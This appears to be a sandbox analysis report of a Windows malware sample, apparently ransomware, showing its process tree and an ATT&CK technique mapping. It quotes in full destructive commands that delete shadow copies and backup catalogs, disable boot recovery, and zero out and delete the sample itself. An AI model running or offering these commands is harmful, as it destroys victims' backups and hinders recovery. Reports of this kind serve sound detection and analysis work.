C:\Users\Admin\AppData\Local\Temp\1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe
"C:\Users\Admin\AppData\Local\Temp\1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Modifies Control Panel
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1768
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2664
- - C:\Windows\system32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:3552
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3568
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2200
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled no
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:4596
- - C:\Windows\system32\wbadmin.exe
    wbadmin delete catalog -quiet
    3⤵
    - Deletes backup catalog
    PID:4972
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe" & Del /f /q "C:\Users\Admin\AppData\Local\Temp\1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5636
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - Runs ping.exe
    PID:5736
- - C:\Windows\SysWOW64\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\1b109db549dd0bf64cadafec575b5895690760c7180a4edbf0c5296766162f18.exe"
    3⤵
    PID:4716

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4300

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:2196

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:3296

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery